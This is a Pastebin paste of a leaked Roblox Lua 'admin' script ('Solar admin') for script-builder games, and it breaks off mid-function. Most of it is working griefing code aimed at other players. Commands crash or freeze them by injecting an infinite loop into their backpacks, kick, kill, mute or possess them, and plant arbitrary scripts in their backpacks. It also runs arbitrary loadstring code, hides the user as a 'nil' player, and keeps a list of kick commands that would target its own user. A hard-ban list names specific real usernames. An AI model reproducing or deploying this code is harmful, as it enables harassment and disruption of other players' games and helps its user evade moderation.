Advertisement
PASTEBINWARRIOR

Untitled

Aug 1st, 2015
351
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.36 KB | None | 0 0
  1.  
  2. --Leaked by ERRORscript
  3.  
  4. --[[
  5. _____/\\\\\\\\\\\_________/\\\\\_______/\\\_________________/\\\\\\\\\_______/\\\\\\\\\_____
  6. ____/\\\/////////\\\_____/\\\///\\\____\/\\\_______________/\\\\\\\\\\\\\___/\\\///////\\\___
  7. ____\//\\\______\///____/\\\/__\///\\\__\/\\\______________/\\\/////////\\\_\/\\\_____\/\\\___
  8. ______\////\\\__________/\\\______\//\\\_\/\\\_____________\/\\\_______\/\\\_\/\\\\\\\\\\\/____
  9. __________\////\\\______\/\\\_______\/\\\_\/\\\_____________\/\\\\\\\\\\\\\\\_\/\\\//////\\\____
  10. ______________\////\\\___\//\\\______/\\\__\/\\\_____________\/\\\/////////\\\_\/\\\____\//\\\___
  11. ________/\\\______\//\\\___\///\\\__/\\\____\/\\\_____________\/\\\_______\/\\\_\/\\\_____\//\\\__
  12. ________\///\\\\\\\\\\\/______\///\\\\\/_____\/\\\\\\\\\\\\\\\_\/\\\_______\/\\\_\/\\\______\//\\\_
  13. _________\///////////__________\/////_______\///////////////__\///________\///__\///________\///__
  14.  
  15. Welcome to Solar admin, this admin is made by:
  16. aleksa12432;
  17. optiplex123/Exorsizer.
  18. This script is legaly copyrighted, so every steal is against law.
  19. You are allowed to edit the script, but leave credits to the real creators.
  20. We don't wan't any abusers of this admin, so don't try to abuse.
  21. If there is an error or bug, report to creators.
  22. For all questions ask aleksa12432 or optiplex123/Exorsizer
  23. This is a safety script, you have nil, local block, and 'bad' words detector.
  24. Newest updates:
  25. Fixed the rotation when cleaned;
  26. Can be used in nil;
  27. Smooth nil movement;
  28. Explore command;
  29. Added 'Hard ban'.
  30. Currently working on:
  31. Nil improvement.
  32. ]]--
  33. --[[STARTUP]]--
  34. wait()
  35. script.Name = "Solar admin"
  36. do
  37. if script:findFirstChild("DSource") ~= nil then
  38. SourceName = "DSource"
  39. elseif script:findFirstChild("Source") ~= nil then
  40. SourceName = "Source"
  41. elseif script:findFirstChild("source") ~= nil then
  42. SourceName = "source"
  43. else
  44. SourceName = "No_Source"
  45. end
  46. end
  47. if SourceName ~= "No_Source" then
  48. print("Source found: "..SourceName)
  49. elseif SourceName == "No_Source" then
  50. error("Source not found, script did not load all features")
  51. end
  52. script:ClearAllChildren()
  53. game.Lighting:ClearAllChildren()
  54. wait()
  55. --[[VARIABLES, BOOLEANS AND TABLES]]--
  56. LocalPlayer = game:GetService("Players").LocalPlayer
  57. runService = game:service'RunService'
  58. LSource = script:Clone()
  59. char = nil
  60. key = nil
  61. Mouse = LocalPlayer:GetMouse()
  62. SunMesh = "http://www.roblox.com/asset/?id=1185246"
  63. SunTexture = "http://www.roblox.com/asset/?id=20261287"
  64. ChatColor = "Institutional white"
  65. Code = "SA: "..game.PlaceId
  66. Key = "/"
  67. SunScale = Vector3.new(3,3,3)
  68. HiddenTablets = false
  69. TabModelDebounce = false
  70. DismissTabOn = false
  71. ChatGui = true
  72. LBlock = true
  73. found = false
  74. NilBoot = false
  75. appearTime = 3
  76. Rotation = 0
  77. Speed = 0.0001
  78. Tabs = {}
  79. Cmds = {}
  80. Banlist = {}
  81. HardBanlist = {"ninevolt781","cappertron20","GOLDC3PO","rabbidog","NoobsAttacks","manofthebase44"}
  82. MuteWords = {}
  83. BadWords = {}
  84. Services = {
  85. game;
  86. game:service'Workspace';
  87. game:service'Players';
  88. game:service'Lighting';
  89. game:service'StarterGui';
  90. game:service'StarterPack';
  91. game:service'Debris';
  92. };
  93. --[[START]]--
  94. if LocalPlayer.Character ~= nil then
  95. LocalPlayer.Character.Archivable = true
  96. Char = LocalPlayer.Character:Clone()
  97. end
  98. if NilBoot == true then
  99. LocalPlayer.Parent = nil
  100. ChatGui = true
  101. appear(CFrame.new(0,25,0))
  102. local a = Char:Clone()
  103. a.Parent = workspace
  104. a.Torso.CFrame = CFrame.new(0,25,0)
  105. LocalPlayer.Character = a
  106. workspace.CurrentCamera.CameraType = "Custom"
  107. workspace.CurrentCamera.CameraSubject = a.Humanoid
  108. wait(5)
  109. SmoothMovement()
  110. end
  111. MuteWords[#MuteWords+1] = LocalPlayer.Name..":Kick()"
  112. MuteWords[#MuteWords+1] = LocalPlayer.Name..":Destroy()"
  113. MuteWords[#MuteWords+1] = LocalPlayer.Name..":remove()"
  114. MuteWords[#MuteWords+1] = '["'..LocalPlayer.Name..'"]:Kick()'
  115. MuteWords[#MuteWords+1] = "['"..LocalPlayer.Name.."']:Kick()"
  116. MuteWords[#MuteWords+1] = '["'..LocalPlayer.Name..'"]:Destroy()'
  117. MuteWords[#MuteWords+1] = "['"..LocalPlayer.Name.."']:Destory()"
  118. MuteWords[#MuteWords+1] = '["'..LocalPlayer.Name..'"]:remove()'
  119. MuteWords[#MuteWords+1] = "['"..LocalPlayer.Name.."']:remove()"
  120. MuteWords[#MuteWords+1] = "'Players':ClearAllChildren()"
  121. MuteWords[#MuteWords+1] = '"Players":ClearAllChildren()'
  122. MuteWords[#MuteWords+1] = "Players:ClearAllChildren()"--alek SD the server or kick manof
  123. for i = 1,#LocalPlayer.Name,1 do
  124. MuteWords[#MuteWords+1] = "kick/"..LocalPlayer.Name:sub(1,i)
  125. end
  126. for i = 1,#LocalPlayer.Name,1 do
  127. MuteWords[#MuteWords+1] = "kick;"..LocalPlayer.Name:sub(1,i)
  128. end
  129. for i = 1,#LocalPlayer.Name,1 do
  130. MuteWords[#MuteWords+1] = "kick:"..LocalPlayer.Name:sub(1,i)
  131. end
  132. for i = 1,#LocalPlayer.Name,1 do
  133. MuteWords[#MuteWords+1] = "kick "..LocalPlayer.Name:sub(1,i)
  134. end
  135. for i = 1,#LocalPlayer.Name,1 do
  136. MuteWords[#MuteWords+1] = ":kick "..LocalPlayer.Name:sub(1,i)
  137. end
  138. for i = 1,#LocalPlayer.Name,1 do
  139. MuteWords[#MuteWords+1] = "/kick/"..LocalPlayer.Name:sub(1,i)
  140. end
  141. for i = 1,#LocalPlayer.Name,1 do
  142. MuteWords[#MuteWords+1] = "kick`"..LocalPlayer.Name:sub(1,i)
  143. end
  144. wait()
  145. --[[TABMODEL]]--
  146. local TabModel = Instance.new("Model")
  147. TabModel.Name = "Solar tabs"
  148. if HiddenTablets == true then
  149. TabModel.Parent = workspace.CurrentCamera
  150. TabModelParent = workspace.CurrentCamera
  151. elseif HiddenTablets == false then
  152. TabModel.Parent = workspace
  153. TabModelParent = workspace
  154. end
  155. --[[PARENTING]]--
  156. script.Parent = _SOLAR_
  157. wait()
  158. --[[FUNCTIONS]]--
  159. function Output(Text,Color,OnClicked)
  160. if TabModel.Parent ~= TabModelParent then return end
  161. if TabModel == nil then return end
  162. if Color == nil then Color = "Institutional white" end
  163. if Text == nil then Text = "" end
  164. local Text = tostring(Text)
  165. Text = Text:gsub("","\5")
  166. local Part = Instance.new("Part", TabModel)
  167. Part.CanCollide = false
  168. Part.Anchored = true
  169. Part.Locked = true
  170. Part.Shape = "Ball"
  171. Part.Size = Vector3.new(3,3,3)
  172. Part.Name = "TABLET: "..math.random(-99999,99999)
  173. if LocalPlayer ~= nil and LocalPlayer.Character ~= nil and LocalPlayer.Character.Torso ~= nil then
  174. Part.CFrame = LocalPlayer.Character.Torso.CFrame
  175. else
  176. Part.CFrame = CFrame.new(0,0,0)
  177. end
  178. local Mesh = Instance.new("SpecialMesh", Part)
  179. Mesh.MeshId = SunMesh
  180. Mesh.TextureId = SunTexture
  181. Mesh.Scale = SunScale
  182. local PointLight = Instance.new("PointLight", Part)
  183. PointLight.Color = BrickColor.new("New Yeller").Color
  184. PointLight.Range = 10
  185. local BillboardGui = Instance.new("BillboardGui", Part)
  186. BillboardGui.Size = UDim2.new(8,0,7,0)
  187. BillboardGui.StudsOffset = Vector3.new(0,2,0)
  188. local TextLabel = Instance.new("TextLabel", BillboardGui)
  189. TextLabel.Text = Text
  190. TextLabel.Size = UDim2.new(1,0,1,0)
  191. TextLabel.BackgroundTransparency = 1
  192. TextLabel.TextColor = BrickColor.new(Color)
  193. TextLabel.Font = "ArialBold"
  194. TextLabel.FontSize = "Size24"
  195. TextLabel.TextStrokeTransparency = 0
  196. local ClickDetector = Instance.new("ClickDetector", Part)
  197. Tabs[#Tabs+1] = Part
  198. ClickDetector.MaxActivationDistance = math.huge
  199. ClickDetector.MouseHoverEnter:connect(function(Player)
  200. if Player.Name == LocalPlayer.Name then
  201. Part.Transparency = 0.5
  202. end
  203. end)
  204. ClickDetector.MouseHoverLeave:connect(function(Player)
  205. if Player.Name == LocalPlayer.Name then
  206. Part.Transparency = 0
  207. end
  208. end)
  209. ClickDetector.MouseClick:connect(function(Player)
  210. if Player.Name == LocalPlayer.Name then
  211. coroutine.wrap(function()
  212. for i = 0,180,10 do
  213. TextLabel.Rotation = i
  214. wait()
  215. end
  216. end)()
  217. coroutine.wrap(function()
  218. for i = 0,1,0.1 do
  219. Part.Transparency = i
  220. wait()
  221. end
  222. wait()
  223. Part:Destroy()
  224. for i,v in pairs(Tabs) do
  225. if v.Name == Part.Name then
  226. table.remove(Tabs,i)
  227. end
  228. end
  229. if OnClicked ~= nil then
  230. OnClicked()
  231. end
  232. end)()
  233. end
  234. end)
  235. if #Tabs > 0 then DismissTab() end
  236. end
  237. function Dismiss()
  238. Tabs = {}
  239. TabModel:ClearAllChildren()
  240. DismissTabOn = false
  241. end
  242. function DismissTab()
  243. if DismissTabOn == true then return end
  244. DismissTabOn = true
  245. Output("Dismiss","Really red", function() Dismiss() DismissTabOn = false end)
  246. end
  247. function Chat(Msg, Clr)
  248. for _,v in pairs(Cmds) do
  249. if #Msg >= #v["Say"]+#Key then
  250. if Msg:lower():sub(1,#v["Say"]+#Key) == v["Say"]:lower()..Key:lower() then
  251. return
  252. end
  253. end
  254. end
  255. if Msg:sub(1,2) == "/e" then return end
  256. if Clr == nil then Clr = "Institutional white" end
  257. if Msg == nil then Msg = "" end
  258. if Msg:sub(1,1) == ";" then Clr = "Really red" Msg = Msg:sub(2) end
  259. if Msg:sub(1,1) == "/" then Clr = "Really blue" Msg = Msg:sub(2) end
  260. Msg = Msg:gsub("","\5")
  261. if LocalPlayer and LocalPlayer.Character and LocalPlayer.Character.Head then
  262. if #LocalPlayer.Character.Head:children() > 15 then return end
  263. for _,v in pairs(LocalPlayer.Character.Head:children()) do
  264. if v.Name == "BG" then
  265. coroutine.wrap(function()
  266. for i = v.StudsOffset.y,v.StudsOffset.y+2,0.1 do
  267. v.StudsOffset = Vector3.new(0,i,0)
  268. wait()
  269. end
  270. wait(2)
  271. if v:findFirstChild("TextLabel") ~= nil then
  272. for i = 0,1,0.1 do
  273. if v:findFirstChild("TextLabel") == nil then break end
  274. v.TextLabel.TextTransparency = i
  275. v.TextLabel.TextStrokeTransparency = i
  276. wait()
  277. end
  278. end
  279. v:Destroy()
  280. end)()
  281. end
  282. end
  283. if ChatGui == false then
  284. return
  285. elseif ChatGui == true then
  286. local BG = Instance.new("BillboardGui", LocalPlayer.Character.Head)
  287. BG.Name = "BG"
  288. BG.Size = UDim2.new(8,0,7,0)
  289. BG.StudsOffset = Vector3.new(0,2,0)
  290. BG.SizeOffset = Vector2.new(0,.1)
  291. local TL = Instance.new("TextLabel", BG)
  292. TL.Text = Msg
  293. TL.BackgroundTransparency = 1
  294. TL.Size = UDim2.new(1,0,.8,0)
  295. TL.Font = "Legacy"
  296. TL.FontSize = "Size24"
  297. TL.TextStrokeTransparency = 0
  298. if Clr ~= "Random" then
  299. TL.TextColor = BrickColor.new(Clr)
  300. elseif Clr == "Random" then
  301. TL.TextColor = BrickColor.random()
  302. end
  303. coroutine.wrap(function()
  304. wait(5)
  305. if TL ~= nil then
  306. for i = 0,1,0.1 do
  307. if TL == nil then break end
  308. TL.TextTransparency = i
  309. TL.TextStrokeTransparency = i
  310. wait()
  311. end
  312. end
  313. BG:Destroy()
  314. end)()
  315. end
  316. end
  317. end
  318. function Notify(Msg)
  319. Chat(Msg,"Really red")
  320. end
  321. function GetPlayers(msg)
  322. local Plrs = {}
  323. if msg == "me" then
  324. table.insert(Plrs, LocalPlayer)
  325. elseif msg == "all" then
  326. Plrs = game:GetService("Players"):GetChildren() --GetPlayers()?
  327. elseif msg == "noobs" then
  328. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  329. if plr.AccountAge < 364 then
  330. table.insert(Plrs, plr)
  331. end
  332. end
  333. elseif msg == "veterans" then
  334. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  335. if plr.AccountAge > 364 then
  336. table.insert(Plrs, plr)
  337. end
  338. end
  339. elseif msg == "others" then
  340. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  341. if v ~= LocalPlayer then
  342. table.insert(Plrs, v)
  343. end
  344. end
  345. else
  346. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  347. if v.Name:lower():sub(1,#msg) == msg:lower() then
  348. table.insert(Plrs, v)
  349. end
  350. end
  351. end
  352. return Plrs
  353. end
  354. function Update(CF)
  355. if TabModel.Parent ~= TabModelParent then return end
  356. if TabModel == nil then return end
  357. Rotation = Rotation + Speed
  358. if TabModel.Parent ~= TabModelParent then return end
  359. if TabModel == nil then return end
  360. for i,v in pairs(Tabs) do
  361. if TabModel.Parent ~= TabModelParent then break end
  362. if TabModel == nil then break end
  363. if v.Parent ~= nil then
  364. if TabModel.Parent ~= TabModelParent then break end
  365. if TabModel == nil then break end
  366. if #Tabs < 201 then
  367. if TabModel.Parent ~= TabModelParent then break end
  368. if TabModel == nil then break end
  369. local CP = v.Position:lerp(CF.p,0.15)
  370. v.CFrame = CFrame.new(CP.X,CP.Y,CP.Z) *CFrame.Angles(0,math.rad(((360/#Tabs)*i)+Rotation),0)
  371. *CFrame.new(0,0,#Tabs*0.15 +0.5)
  372. else
  373. if TabModel.Parent ~= TabModelParent then break end
  374. if TabModel == nil then break end
  375. v:Destroy()
  376. end
  377. if TabModel.Parent ~= TabModelParent then break end
  378. if TabModel == nil then break end
  379. end
  380. end
  381. end
  382. function AddCmd(Name, Say, Desc, Func)
  383. Cmds[#Cmds+1] = {["Name"] = Name, ["Say"] = Say, ["Desc"] = Desc, ["Func"] = Func}
  384. end
  385. function ShowCmds()
  386. Dismiss()
  387. for _,v in pairs(Cmds) do
  388. Output(v["Name"],nil,
  389. function()
  390. Dismiss()
  391. Output("Name: "..v["Name"])
  392. Output("Usage: "..v["Say"])
  393. Output("Description: "..v["Desc"])
  394. Output("Back","Really red",function() ShowCmds() end)
  395. end
  396. )
  397. end
  398. end
  399. function NewS(SourceValue, Parent)
  400. if NewScript then
  401. local scr = NewScript:Clone()
  402. if scr:FindFirstChild(SourceName) then
  403. if scr:FindFirstChild(SourceName) then
  404. scr:FindFirstChild(SourceName).Value = SourceValue
  405. scr.Parent = Parent
  406. wait()
  407. scr.Disabled = false
  408. return scr
  409. end
  410. end
  411. else
  412. Output("No source","Really red")
  413. end
  414. end
  415. function NewLS(SourceValue, Parent)
  416. if SourceName == "No_Source" then return end
  417. if game.PlaceId == 54194680 then
  418. NLS(SourceValue, Parent)
  419. else
  420. local NS = LSource:Clone()
  421. NS.Name = "NewLocal"
  422. local Source = NS:findFirstChild(SourceName)
  423. if Source == nil then
  424. Instance.new('StringValue',NS).Name = SourceName
  425. end
  426. Source = NS:findFirstChild(SourceName)
  427. Source.Value = SourceValue
  428. NS.Parent = Parent
  429. NS.Disabled = false
  430. return NS
  431. end
  432. end
  433. function ShowBL()
  434. Dismiss()
  435. for _,v in pairs(Banlist) do
  436. Output(v,nil, function()
  437. Dismiss()
  438. Output(v)
  439. Output("Un-Ban","Really red", function()
  440. table.remove(Banlist, _)
  441. end)
  442. Output("Back","Really red", function()
  443. ShowBL()
  444. end)
  445. end)
  446. end
  447. end
  448. function ShowHBL()
  449. Dismiss()
  450. for _,v in pairs(HardBanlist) do
  451. Output(v,nil, function()
  452. Dismiss()
  453. Output(v)
  454. Output("Un-Ban","Really red", function()
  455. table.remove(HardBanlist, _)
  456. end)
  457. Output("Back","Really red", function()
  458. ShowBL()
  459. end)
  460. end)
  461. end
  462. end
  463. function Connect(who)
  464. if who and who.Backpack then
  465. NewLS(ConnectSource, who.Backpack)
  466. Output("Connected: "..who.Name)
  467. end
  468. end
  469. function SmoothMovement()
  470. if char ~= nil then char = nil end
  471. wait()
  472. if LocalPlayer.Character.Parent == nil then return end
  473. if LocalPlayer.Character == nil then return end
  474. char = LocalPlayer.Character
  475. char.Torso.Anchored = true
  476. Mouse.KeyDown:connect(function(kai)
  477. if kai == "w" then
  478. key = "w"
  479. elseif kai == "s" then
  480. key = "s"
  481. elseif kai == "a" then
  482. key = "a"
  483. elseif kai == "d" then
  484. key = "d"
  485. end
  486. end)
  487. Mouse.KeyUp:connect(function(kai)
  488. if kai == "w" then
  489. key = nil
  490. elseif kai == "s" then
  491. key = nil
  492. elseif kai == "a" then
  493. key = nil
  494. elseif kai == "d" then
  495. key = nil
  496. end
  497. end)
  498. while wait() do
  499. if char == nil then break end
  500. if key == "w" then
  501. if char == nil then break end
  502. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,-0.5)
  503. elseif key == "s" then
  504. if char == nil then break end
  505. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,0.5)
  506. elseif key == "a" then
  507. if char == nil then break end
  508. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(-0.5,0,0)
  509. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,0.5,0)
  510. elseif key == "d" then
  511. if char == nil then break end
  512. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0.5,0,0)
  513. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,-0.5,0)
  514. end
  515. end
  516. end
  517. function Explore(part)
  518. Dismiss()
  519. if part == nil then
  520. for _,v in pairs(Services) do
  521. Output(v.Name,nil,function() Explore(v) end)
  522. end
  523. else
  524. for _,v in pairs(part:children()) do
  525. Output(v.Name,nil,function() Explore(v) end)
  526. end
  527. wait()
  528. Output("Currently exploring: "..part.Name,"Really red")
  529. Output("Class name: "..part.ClassName,"Really red")
  530. Output("Destroy","Really red",function() part:Destroy() Explore(part.Parent) end)
  531. Output("Remove","Really red",function() part:remove() Explore(part.Parent) end)
  532. end
  533. end
  534. function appear(pos)
  535. local parts = {}
  536. local frames = appearTime / (1 / 30)
  537. local t = 1
  538. if pos == nil then pos = CFrame.new(0, 25, 0) end
  539. for i=1,500 do
  540. local p = Instance.new("Part", game.Workspace)
  541. p.Anchored = true
  542. p.CanCollide = false
  543. p.formFactor = 3
  544. p.Size = Vector3.new(1, 1, 1)
  545. p.TopSurface = 0
  546. p.BottomSurface = 0
  547. p.BrickColor = BrickColor.random()
  548. local x, y, z = math.random(-10, 10) / 100, math.random(-10, 10) / 100, math.random(-10, 10) / 100
  549. p.CFrame = pos * CFrame.new(x * frames, y * frames, z * frames)
  550. local mesh = Instance.new("SpecialMesh", p)
  551. mesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  552. mesh.Scale = Vector3.new(0.9, 0.9, 0.9)
  553. table.insert(parts, {p, CFrame.new(-x, -y, -z) * CFrame.Angles(x, y, z)})
  554. end
  555. for i=1,frames do
  556. local _, duration = runService.Stepped:wait()
  557. for i,v in pairs(parts) do
  558. if v[1].Parent then
  559. v[1].CFrame = v[1].CFrame * v[2]
  560. v[1].Transparency = t
  561. end
  562. end
  563. t = t - (appearTime / frames)
  564. end
  565. for i,v in pairs(parts) do
  566. if v[1].Parent then
  567. v[1]:remove()
  568. end
  569. end
  570. end
  571. --[[COMMANDS]]--
  572. AddCmd("Ping","ping","Ping something",
  573. function(nothing, msg)
  574. Output(tostring(msg))
  575. end
  576. )
  577. AddCmd("Commands","cmds","Show all commands",
  578. function()
  579. ShowCmds()
  580. end
  581. )
  582. AddCmd("#Commands","#cmds","Show the number of commands",
  583. function()
  584. Output(tostring(#Cmds))
  585. end
  586. )
  587. AddCmd("Dismiss","dt","Dismiss tabs",
  588. function()
  589. Dismiss()
  590. end
  591. )
  592. AddCmd("Toggle tabs visibility","hid","Make the tabs visible/invisible",
  593. function(nothing, msg)
  594. if msg == "on" then
  595. HiddenTablets = true
  596. TabModel.Parent = workspace.CurrentCamera
  597. TabModelParent = workspace.CurrentCamera
  598. Output("Tabs are hidden","Really red")
  599. elseif msg == "off" then
  600. HiddenTablets = false
  601. TabModel.Parent = workspace
  602. TabModelParent = workspace
  603. Output("Tabs are visible","Really red")
  604. else
  605. Output("Use on/off to toggle tab visibility","Really red")
  606. end
  607. end
  608. )
  609. AddCmd("Execute","exe","Execute",
  610. function(nothing, msg)
  611. a,b = ypcall(function()
  612. loadstring(msg)()
  613. end)
  614. if not a then Output(b,"Really red") end
  615. end
  616. )
  617. AddCmd("Toggle local block","tlb","Toggle local block on/off",
  618. function(nothing, msg)
  619. if msg == "on" then
  620. LBlock = true
  621. Output("Local block on","Really red")
  622. elseif msg == "off" then
  623. LBlock = false
  624. Output("Local block off")
  625. else
  626. Output("Use on/off to toggle local block","Really red")
  627. end
  628. end
  629. )
  630. AddCmd("Kick","kick","Kick player",
  631. function(Plrs)
  632. for _, plr in pairs(Plrs) do
  633. if plr then
  634. NewS("game:service'Players':findFirstChild('"..plr.Name.."'):Kick()", workspace)
  635. end
  636. end
  637. end
  638. )
  639. AddCmd("Banlist","bl","Show banned players",
  640. function()
  641. ShowBL()
  642. end
  643. )
  644. AddCmd("Hard Banlist","hbl","Show hard banned players",
  645. function()
  646. ShowHBL()
  647. end
  648. )
  649. AddCmd("Semi-Crash","scrash","Semi-crash a player",
  650. function(Plrs)
  651. for _,plr in pairs(Plrs) do
  652. if plr and plr.Backpack then
  653. NewLS("repeat until false",plr.Backpack)
  654. end
  655. end
  656. end
  657. )
  658. AddCmd("Crash","crash","Crash a player (use nil to crash nil players)",
  659. function(nothing, msg)
  660. local a = Instance.new("StringValue", game.Lighting)
  661. a.Name = "DISC: "..msg
  662. game:service'Debris':AddItem(a, 3)
  663. end
  664. )
  665. AddCmd("Mute","mute","Block player's chat",
  666. function(Plrs)
  667. for _, plr in pairs(Plrs) do
  668. if plr and plr.Backpack then
  669. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  670. end
  671. end
  672. end
  673. )
  674. AddCmd("Un-Mute","unmute","Un-Block player's chat",
  675. function(Plrs)
  676. for _, plr in pairs(Plrs) do
  677. if plr and plr.Backpack then
  678. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  679. end
  680. end
  681. end
  682. )
  683. AddCmd("Clean","clean","Clean workspace",
  684. function()
  685. for _,v in pairs(workspace:children()) do
  686. if v.Name ~= "Terrain" then
  687. v:Destroy()
  688. end
  689. end
  690. NewS("for _,v in pairs(game:service'Players':children()) do if v:IsA('Player') then v:LoadCharacter() end end", workspace)
  691. local base = Instance.new("Part", workspace)
  692. base.Anchored = true
  693. base.Size = Vector3.new(1000,1.2,1000)
  694. base.BrickColor = BrickColor.new("Dark green")
  695. base.Material = "Grass"
  696. end
  697. )
  698. AddCmd("Remove","cremove","Remove the script",
  699. function()
  700. for i = 0,50,1 do
  701. pcall(function()
  702. for j,k in pairs(getfenv(i)) do
  703. getfenv(i)[j] = nil
  704. end
  705. end)
  706. end
  707. end
  708. )
  709. AddCmd("Script","c","Script something",
  710. function(nothing, msg)
  711. if found then
  712. NewS(msg,workspace)
  713. else
  714. Output("No source","Really red")
  715. end
  716. end
  717. )
  718. AddCmd("Kill","kill","Kill player",
  719. function(Plrs)
  720. for _, plr in pairs(Plrs) do
  721. if plr and plr.Character then
  722. plr.Character:breakJoints''
  723. end
  724. end
  725. end
  726. )
  727. AddCmd("NewLocal","newlocal","Inserts a new local in someones backpack",
  728. function(Plrs, msg)
  729. local KeyPos = msg:find(Key)
  730. local TargPlrs = msg:sub(1,KeyPos-1)
  731. local Plrs = GetPlayers(TargPlrs)
  732. local Srce = msg:sub(KeyPos+1)
  733. for _,plr in pairs(Plrs) do
  734. if plr and plr.Backpack then
  735. NewLS(Srce, plr.Backpack)
  736. end
  737. end
  738. end
  739. )
  740. AddCmd("Ban","ban","Bans a player",
  741. function(Plrs)
  742. for _, plr in pairs(Plrs) do
  743. if plr and plr.Backpack then
  744. Banlist[#Banlist +1] = plr.Name
  745. NewS("game:service'Players':findFirstChild('"..plr.Name.."'):Kick()", workspace)
  746. end
  747. end
  748. end
  749. )
  750. AddCmd("Rejoin","rj","Rejoins a player",
  751. function(Plrs)
  752. for _,plr in pairs(Plrs) do
  753. if plr and plr.Character then
  754. if SourceName == "source" then
  755. Output("This is Alakazards scriptbuilder. TPService is disabled here! Can't TP!","Really red")
  756. end
  757. if SourceName ~= "source" then
  758. NewLS([[game:GetService('TeleportService'):Teleport(game.PlaceId)]],plr.Character)
  759. end
  760. end
  761. end
  762. end
  763. )
  764. AddCmd("Ban","ban","Bans a player",
  765. function(Plrs)
  766. for _, plr in pairs(Plrs) do
  767. if plr and plr.Backpack then
  768. Banlist[#Banlist+1] = plr.Name
  769. end
  770. end
  771. end
  772. )
  773. AddCmd("Chat","chat","Turns chat on/off",
  774. function(nothing, msg)
  775. if msg == "on" then
  776. ChatGui = true
  777. elseif msg == "off" then
  778. ChatGui = false
  779. end
  780. end
  781. )
  782. AddCmd("GetAge","ga","Get age of a player",
  783. function(Plrs)
  784. for _, plr in pairs(Plrs) do
  785. if plr then
  786. Output(plr.Name..": "..tostring(plr.AccountAge))
  787. end
  788. end
  789. end)
  790. AddCmd("Hint","h","Show some hint",
  791. function(nothing, msg)
  792. if found then
  793. NewS([[
  794. a = Instance.new("Hint", workspace)
  795. msg = "]]..msg..[["
  796. msg = msg:gsub("","\5")
  797. game:service'Debris':AddItem(a, 5)
  798. while wait() do
  799. for i = 30,0,-1 do
  800. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  801. wait()
  802. end
  803. for i = 0,30,1 do
  804. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  805. wait()
  806. end
  807. end
  808. ]], workspace)
  809. end
  810. end
  811. )
  812. AddCmd("Message","m","Show a message",
  813. function(nothing, msg)
  814. if found then
  815. NewS([[
  816. a = Instance.new("Message", workspace)
  817. msg = "]]..msg..[["
  818. msg = msg:gsub("","\5")
  819. game:service'Debris':AddItem(a, 5)
  820. while wait() do
  821. for i = 30,0,-1 do
  822. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  823. wait()
  824. end
  825. for i = 0,30,1 do
  826. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  827. wait()
  828. end
  829. end
  830. ]], workspace)
  831. end
  832. end
  833. )
  834. AddCmd("Char","char","Be a character",
  835. function()
  836. if LocalPlayer.Parent == game.Players then return end
  837. if LocalPlayer.Character~= nil then
  838. LocalPlayer.Character:Destroy()
  839. end
  840. char = nil
  841. appear(CFrame.new(0,25,0))
  842. local a = Char:Clone()
  843. a.Parent = workspace
  844. a.Torso.CFrame = CFrame.new(0,25,0)
  845. LocalPlayer.Character = a
  846. workspace.CurrentCamera.CameraType = "Custom"
  847. workspace.CurrentCamera.CameraSubject = a.Humanoid
  848. wait(5)
  849. SmoothMovement()
  850. end
  851. )
  852. AddCmd("Refresh 'nil smooth movement'","rnsm","Refresh the movement when you are nil",
  853. function()
  854. if LocalPlayer.Parent == nil then
  855. char = nil
  856. wait()
  857. SmoothMovement()
  858. else
  859. Output("You are not nil.","Really red")
  860. end
  861. end
  862. )
  863. AddCmd("Go nil","gn","Go to nil player mode",
  864. function()
  865. LocalPlayer.Parent = nil
  866. appear(CFrame.new(0,25,0))
  867. local a = Char:Clone()
  868. a.Torso.CFrame = CFrame.new(0,25,0)
  869. a.Parent = workspace
  870. LocalPlayer.Character = a
  871. workspace.CurrentCamera.CameraType = "Custom"
  872. workspace.CurrentCamera.CameraSubject = a.Humanoid
  873. wait(5)
  874. SmoothMovement()
  875. end
  876. )
  877. AddCmd("Fix camera","fcam","Fix your camera",
  878. function()
  879. workspace.CurrentCamera.CameraType = "Custom"
  880. workspace.CurrentCamera.CameraSubject = LocalPlayer.Character.Humanoid
  881. end
  882. )
  883. AddCmd("Nils","nilp","Get nil players",
  884. function()
  885. NewS([[
  886. Model = Instance.new("Model", game.Lighting)
  887. Model.Name = "SolarAdminNilPlayers"
  888. for _,v in pairs(game:service'NetworkServer':children()) do
  889. if v:GetPlayer() then
  890. if v:GetPlayer().Parent ~= game:service'Players' then
  891. Instance.new("StringValue",Model).Value = v:GetPlayer().Name
  892. end
  893. end
  894. end
  895. ]], workspace)
  896. wait()
  897. np = nil
  898. for i = 0,5,1 do
  899. if game.Lighting:findFirstChild("SolarAdminNilPlayers") then
  900. np = game.Lighting:findFirstChild("SolarAdminNilPlayers")
  901. break
  902. end
  903. wait(0.1)
  904. end
  905. if np ~= nil then
  906. Dismiss()
  907. for _,v in pairs(np:children()) do
  908. if v:IsA("StringValue") then
  909. Output(v.Value,"Really red")
  910. end
  911. end
  912. elseif np == nil then
  913. Output("Something went wrong.","Really red")
  914. end
  915. end
  916. )
  917. AddCmd("Possess","ps","Possess a player",
  918. function(Plrs)
  919. for _, plr in pairs(Plrs) do
  920. if plr and plr.Character then
  921. LocalPlayer.Character = plr.Character
  922. workspace.CurrentCamera.CameraType = "Custom"
  923. workspace.CurrentCamera.CameraSubject = plr.Character.Humanoid
  924. end
  925. end
  926. end
  927. )
  928. AddCmd("'Hard' ban","hb","Hard ban a player",
  929. function(Plrs)
  930. for _, plr in pairs(Plrs) do
  931. if plr then
